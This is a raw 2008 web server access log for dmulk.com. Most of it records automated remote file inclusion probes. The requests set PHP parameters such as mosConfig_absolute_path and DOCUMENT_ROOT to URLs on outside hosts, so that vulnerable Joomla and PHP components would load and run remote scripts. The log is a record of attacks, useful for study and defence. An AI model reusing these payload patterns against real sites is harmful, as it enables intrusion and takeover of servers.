77.221.130.15 - - [24/Jul/2008:07:39:52 -0700] "GET /errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:40:18 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:40:18 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:07:40:37 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:07:40:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jul/2008:07:40:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:40:52 -0700] "GET /logs/access_080315.log//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:40:54 -0700] "GET //index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18541 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:40:54 -0700] "GET /logs//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:07:41:01 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:07:41:05 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 200 18457 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:07:41:05 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:41:08 -0700] "GET /?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 200 18407 "-" "libwww-perl/5.53" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:41:09 -0700] "GET /logs/access_080315.log/errors.php?error=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:41:09 -0700] "GET /errors.php?error=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:07:41:10 -0700] "GET /logs/errors.php?error=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:41:50 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:41:50 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
75.0.18.81 - - [24/Jul/2008:07:42:37 -0700] "GET /logs/access.log/errors.php?error=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.18.81 - - [24/Jul/2008:07:42:37 -0700] "GET /errors.php?error=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.18.81 - - [24/Jul/2008:07:42:45 -0700] "GET /logs/errors.php?error=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:43:18 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:43:18 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:43:23 -0700] "GET /logs/access_080313.log/?sourcedir=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:43:25 -0700] "GET /?sourcedir=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:43:26 -0700] "GET /logs/?sourcedir=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 200 57423 "-" "libwww-perl/5.79" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:44:03 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:44:05 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:44:05 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:44:47 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:44:47 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
62.112.193.46 - - [24/Jul/2008:07:45:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jul/2008:07:45:03 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jul/2008:07:45:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 200 18569 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:07:45:29 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:07:45:29 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:45:56 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:45:57 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:45:57 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:45:57 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:46:00 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:46:01 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:46:23 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:46:23 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:46:30 -0700] "GET /logs/?sourcedir=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 200 57423 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:46:36 -0700] "GET /?sourcedir=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.79" "www.dmulk.com"
206.248.167.129 - - [24/Jul/2008:07:47:12 -0700] "GET /logs/access_080218.log/?sourcedir=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.204.109.42 - - [24/Jul/2008:07:47:15 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.109.42 - - [24/Jul/2008:07:47:16 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.109.42 - - [24/Jul/2008:07:47:16 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/Jul/2008:07:47:35 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.240.146 - - [24/Jul/2008:07:47:39 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.destarre.be/language/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.53.240.146 - - [24/Jul/2008:07:47:39 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.destarre.be/language/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:47:57 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:47:57 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:07:48:46 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:48:59 -0700] "GET /blog/?pageid=159&show=slide HTTP/1.1" 200 37831 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:49:12 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:49:12 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:49:18 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:49:19 -0700] "GET //ashnews.php?pathtoashnews=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:49:24 -0700] "GET /logs//ashnews.php?pathtoashnews=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:49:31 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:49:31 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:49:32 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:49:56 -0700] "GET /blog/?nggpage=3&pageid=17&show=gallery HTTP/1.1" 200 47020 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:49:56 -0700] "GET /blog/?pageid=17&show=gallery&nggpage=2 HTTP/1.1" 200 54419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
160.99.12.231 - - [24/Jul/2008:07:50:49 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:51:00 -0700] "GET /logs//main.php?sayfa=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:51:00 -0700] "GET //main.php?sayfa=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:51:51 -0700] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:51:51 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:52:02 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.53.83 - - [24/Jul/2008:07:52:57 -0700] "GET /errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.127 - - [24/Jul/2008:07:53:02 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.timeshare-sales-professionals.org/com/id.txt?? HTTP/1.1" 200 18457 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.53.83 - - [24/Jul/2008:07:53:02 -0700] "GET /logs/access.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:07:53:31 -0700] "GET /bikes/?D=A HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.53.83 - - [24/Jul/2008:07:54:29 -0700] "GET /logs/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:07:54:40 -0700] "GET /logs/errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:07:54:41 -0700] "GET /errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:55:34 -0700] "GET /logs/access_080322.log//modules/TotalCalendar/about.php?inc_dir=http://alieandrann.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:07:55:46 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [24/Jul/2008:07:55:48 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:55:52 -0700] "GET /logs//main.php?sayfa=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:55:58 -0700] "GET /logs//main.php?sayfa=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:56:01 -0700] "GET //main.php?sayfa=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:07:56:01 -0700] "GET //main.php?sayfa=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:56:07 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:56:07 -0700] "GET //modules/xfsection/modify.php?dir_module=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:56:35 -0700] "GET /logs/access_080218.log//modules/xfsection/modify.php?dir_module=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.133.102.211 - - [24/Jul/2008:07:56:35 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:07:56:42 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:07:56:51 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.53.83 - - [24/Jul/2008:07:57:17 -0700] "GET /logs/access_080315.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.53.83 - - [24/Jul/2008:07:57:17 -0700] "GET /errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.53.83 - - [24/Jul/2008:07:57:17 -0700] "GET /logs/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:07:57:31 -0700] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.48.146 - - [24/Jul/2008:07:57:57 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.48.146 - - [24/Jul/2008:07:57:57 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:58:21 -0700] "GET /logs/access_080311.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:58:23 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18557 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:58:23 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:58:48 -0700] "GET /logs/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:07:58:49 -0700] "GET /errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:58:56 -0700] "GET /logs/access_080225.log//index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.97.61.212 - - [24/Jul/2008:07:59:36 -0700] "GET /index.php?pagina=http://alieandrann.net/id.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.61.65 - - [24/Jul/2008:07:59:51 -0700] "GET /admin.admin.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.31.61.65 - - [24/Jul/2008:07:59:51 -0700] "GET /admin.admin.html.php?mosConfig_absolute_path=http://www.fullscores.com/media/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
217.31.61.65 - - [24/Jul/2008:07:59:57 -0700] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.31.61.65 - - [24/Jul/2008:07:59:57 -0700] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://www.fullscores.com/media/t.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:08:00:33 -0700] "GET /logs/access.log//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:08:00:33 -0700] "GET //errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.221.154.111 - - [24/Jul/2008:08:00:34 -0700] "GET /logs//errors.php?error=http://http://www.community.nigeria.com//forums/Packages/data/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:01:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:01:05 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:01:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.111.161 - - [24/Jul/2008:08:01:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:08:01:16 -0700] "GET /logs/errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.166.128.73 - - [24/Jul/2008:08:01:16 -0700] "GET /errors.php?error=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
